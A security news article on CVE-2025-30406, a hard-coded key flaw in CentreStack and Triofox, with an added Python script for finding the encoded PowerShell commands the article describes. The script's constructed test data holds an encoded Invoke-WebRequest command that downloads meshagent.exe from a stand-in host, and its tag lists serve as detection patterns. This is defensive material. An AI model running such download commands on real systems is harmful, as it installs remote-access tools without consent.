Triofox Vulnerability Exploited in Attacks


A critical security flaw recently uncovered in Gladinet CentreStack also affects its counterpart, Triofox, a remote access and collaboration platform, according to cybersecurity firm Huntress. So far, attackers have compromised systems at seven different organizations.

Tracked as CVE-2025-30406 with a CVSS score of 9.0, the vulnerability stems from a hard-coded cryptographic key. This weakness enables attackers to execute remote code on exposed servers.

CentreStack addressed the flaw in version 16.4.10315.56368, released on April 3, 2025. However, Huntress now confirms that the same issue exists in Triofox versions up to 16.4.10317.56372.

“Earlier versions of Triofox use the same hardcoded cryptographic keys,” said John Hammond, principal cybersecurity researcher at Huntress. “This configuration allows easy abuse for remote code execution.”

Huntress telemetry shows CentreStack is deployed on about 120 endpoints, and the vulnerability has already been exploited across seven separate organizations.

The first known compromise occurred on April 11, 2025, at 16:59:44 UTC. In these incidents, attackers used the flaw to run encoded PowerShell scripts, download and sideload malicious DLLs, move laterally within the network, and install MeshCentral for remote control.

Researchers also observed attackers executing Impacket PowerShell commands to gather system details and deploy MeshAgent. While the campaign’s full extent and objectives remain unclear, the tactics are similar to those used in recent attacks targeting CrushFTP vulnerabilities.
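To hunt for the encoded PowerShell activity described above, the following added example (not from Huntress or the original article) decodes `-EncodedCommand` arguments found in process-creation command lines and tags decoded scripts that mention MeshAgent, downloads or DLLs. The sample command lines and the keyword tags are constructed assumptions, not indicators recovered from the incidents.

```python
import base64
import binascii
import re

# A flag token followed by a base64 blob. PowerShell accepts any prefix of
# -EncodedCommand (-e, -enc, ...) as well as the -ec alias.
FLAG_BLOB = re.compile(r"[-/]([A-Za-z]+)\s+([A-Za-z0-9+/]{16,}={0,2})")

# Hypothetical keyword tags based on the behaviours the article lists.
TAGS = {
    "remote-access agent": ("meshagent", "meshcentral"),
    "download": ("invoke-webrequest", "downloadfile", "downloadstring"),
    "dll staging": (".dll",),
}

def decode_encoded(cmdline):
    """Return the decoded script from a PowerShell command line, or None."""
    for flag, blob in FLAG_BLOB.findall(cmdline):
        flag = flag.lower()
        if not ("encodedcommand".startswith(flag) or flag == "ec"):
            continue  # e.g. -ExecutionPolicy is not an encoded-command flag
        try:
            # -EncodedCommand payloads are base64 over UTF-16LE text.
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64 / not UTF-16LE: ignore this token
    return None

def triage(cmdlines):
    """Return (index, decoded script, sorted tags) for each encoded command."""
    hits = []
    for i, line in enumerate(cmdlines):
        script = decode_encoded(line)
        if script is None:
            continue
        low = script.lower()
        tags = sorted(t for t, words in TAGS.items() if any(w in low for w in words))
        hits.append((i, script, tags))
    return hits

def _enc(script):  # helper used only to build the constructed samples below
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample command lines (not real telemetry).
SAMPLE = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -enc "
    + _enc("Invoke-WebRequest http://example.invalid/meshagent.exe -OutFile C:\\Windows\\Temp\\agent.exe"),
    "powershell.exe -Command Get-Service",
    "powershell.exe -e " + _enc("Get-ChildItem C:\\inetpub"),
]
```

Untagged hits still deserve review: any encoded PowerShell launched on a CentreStack or Triofox server is worth decoding and reading in full.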

Due to active exploitation, users of both CentreStack and Triofox are urged to update to the latest versions immediately to mitigate the risk of compromise.